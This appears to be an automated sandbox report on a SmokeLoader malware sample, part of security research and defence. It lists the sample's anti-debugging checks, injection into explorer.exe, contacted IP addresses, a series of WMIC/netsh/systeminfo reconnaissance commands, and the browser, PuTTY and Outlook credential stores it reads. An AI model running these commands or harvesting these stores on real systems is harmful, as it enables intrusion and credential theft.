    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: global block list test formVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: tasks.office.comVMware20,11696487552o
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: 9C13.tmp.13.drBinary or memory string: AMC password management pageVMware20,11696487552
    Source: explorer.exe, 00000002.00000000.2219776484.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
    Source: 9C13.tmp.13.drBinary or memory string: interactivebrokers.comVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: dev.azure.comVMware20,11696487552j
    Source: 9C13.tmp.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
    Source: 9C13.tmp.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
    Source: 9C13.tmp.13.drBinary or memory string: outlook.office365.comVMware20,11696487552t
    Source: explorer.exe, 00000002.00000000.2222980107.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
    Source: explorer.exe, 00000002.00000000.2216587269.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
    Source: 9C13.tmp.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
    Source: 9C13.tmp.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
    Source: 9C13.tmp.13.drBinary or memory string: bankofamerica.comVMware20,11696487552x
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH@
    Source: 9C13.tmp.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
    Source: 8CAE.exe, 0000000B.00000002.4580154670.000002404C80E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
    Source: 9C13.tmp.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
    Source: ROUTE.EXE, 00000025.00000002.3963036050.000002EE38E59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
    Source: explorer.exe, 00000002.00000000.2219776484.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
    Source: explorer.exe, 00000002.00000000.2219404532.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
    Source: 9C13.tmp.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
    Source: 9C13.tmp.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
    Source: explorer.exe, 00000002.00000000.2216587269.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
    Source: 9C13.tmp.13.drBinary or memory string: outlook.office.comVMware20,11696487552s
    Source: 9C13.tmp.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
    Source: explorer.exe, 00000002.00000000.2219776484.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
    Source: 9C13.tmp.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
    Source: 9C13.tmp.13.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
    Source: 9C13.tmp.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
    Source: explorer.exe, 00000002.00000000.2216587269.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: 9C13.tmp.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00401E65 rdtsc 9_2_00401E65
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,16_2_02F01B17
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F01016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_02F01016
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,11_2_00007FF7CBCA78EC
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_005F092B mov eax, dword ptr fs:[00000030h]0_2_005F092B
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_005F0D90 mov eax, dword ptr fs:[00000030h]0_2_005F0D90
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_006222E4 push dword ptr fs:[00000030h]0_2_006222E4
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_006B092B mov eax, dword ptr fs:[00000030h]6_2_006B092B
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_006B0D90 mov eax, dword ptr fs:[00000030h]6_2_006B0D90
    Source: C:\Users\user\AppData\Roaming\jvgasiiCode function: 6_2_007E03C4 push dword ptr fs:[00000030h]6_2_007E03C4
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_0053092B mov eax, dword ptr fs:[00000030h]9_2_0053092B
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_00530D90 mov eax, dword ptr fs:[00000030h]9_2_00530D90
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeCode function: 9_2_006D5A8F push dword ptr fs:[00000030h]9_2_006D5A8F
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_0060092B mov eax, dword ptr fs:[00000030h]10_2_0060092B
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_00600D90 mov eax, dword ptr fs:[00000030h]10_2_00600D90
    Source: C:\Users\user\AppData\Roaming\uegasiiCode function: 10_2_007464E7 push dword ptr fs:[00000030h]10_2_007464E7
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeCode function: 11_2_00007FF7CBCA2654 GetProcessHeap,RtlReAllocateHeap,11_2_00007FF7CBCA2654

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Benign windows process drops PE files
    Source: C:\Windows\explorer.exeFile created: DE97.exe.2.drJump to dropped file
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\explorer.exeNetwork Connect: 190.249.249.14 80Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.168 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 160.177.223.165 80Jump to behavior
    Creates a thread in another existing process (thread injection)
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeThread created: C:\Windows\explorer.exe EIP: 86819A8Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiThread created: unknown EIP: 2FC19A8Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeThread created: unknown EIP: 51B1970Jump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiThread created: unknown EIP: 2DA1970Jump to behavior
    Injects code into the Windows Explorer (explorer.exe)
    Source: C:\Windows\explorer.exeMemory written: PID: 3536 base: 6B79C0 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 1908 base: 7FF6091E2D10 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 6316 base: 6B79C0 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 2736 base: 7FF6091E2D10 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 1600 base: 6B79C0 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 3488 base: 7FF6091E2D10 value: 90Jump to behavior
    Maps a DLL or memory area into another process
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Writes to foreign memory regions
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 6B79C0Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 6B79C0Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 6B79C0Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe18_2_00471016
    Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe18_2_004710A5
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
    Source: explorer.exe, 00000002.00000000.2216801762.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
    Source: explorer.exe, 00000002.00000000.2216801762.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2217863499.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000002.00000000.2216801762.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000002.00000000.2216587269.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
    Source: explorer.exe, 00000002.00000000.2216801762.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 00000002.00000000.2219776484.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_004855EB cpuid 13_2_004855EB
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeCode function: 0_2_00418DF0 InterlockedCompareExchange,GetFocus,ReadConsoleA,FindAtomA,SearchPathA,SetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExW,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmW,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthW,GetBinaryType,FormatMessageA,GetLongPathNameA,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange,0_2_00418DF0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00432198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,13_2_00432198
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Modifies the windows firewall
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
    Uses netsh to modify the Windows network and firewall settings
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: 8CAE.exe, 0000000B.00000002.4581484598.000002404C82F000.00000004.00000020.00020000.00000000.sdmp, 8CAE.exe, 0000000B.00000003.3320217363.000002404C821000.00000004.00000020.00020000.00000000.sdmp, 8CAE.exe, 0000000B.00000003.3608910375.000002404C832000.00000004.00000020.00020000.00000000.sdmp, 8CAE.exe, 0000000B.00000003.3320585267.000002404C82E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

    Stealing of Sensitive Information

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6316, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2736, type: MEMORYSTR
    Source: Yara matchFile source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Tries to steal Mail credentials (via file / registry access)
    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

    Remote Access Functionality

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6316, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2736, type: MEMORYSTR
    Source: Yara matchFile source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		2
    Disable or Modify Tools    		1
    OS Credential Dumping    		11
    System Time Discovery    		Remote Services11
    Archive Collected Data    		3
    Ingress Tool Transfer    		Exfiltration Over Other Network Medium1
    Data Encrypted for Impact
    CredentialsDomainsDefault Accounts11
    Native API    		Boot or Logon Initialization Scripts522
    Process Injection    		1
    Deobfuscate/Decode Files or Information    		11
    Input Capture    		3
    File and Directory Discovery    		Remote Desktop Protocol1
    Data from Local System    		21
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution    		Logon Script (Windows)Logon Script (Windows)3
    Obfuscated Files or Information    		1
    Credentials in Registry    		249
    System Information Discovery    		SMB/Windows Admin Shares1
    Email Collection    		4
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Command and Scripting Interpreter    		Login HookLogin Hook12
    Software Packing    		NTDS1
    Query Registry    		Distributed Component Object Model11
    Input Capture    		115
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets881
    Security Software Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    File Deletion    		Cached Domain Credentials34
    Virtualization/Sandbox Evasion    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
    Masquerading    		DCSync4
    Process Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job34
    Virtualization/Sandbox Evasion    		Proc Filesystem1
    Application Window Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt522
    Process Injection    		/etc/passwd and /etc/shadow1
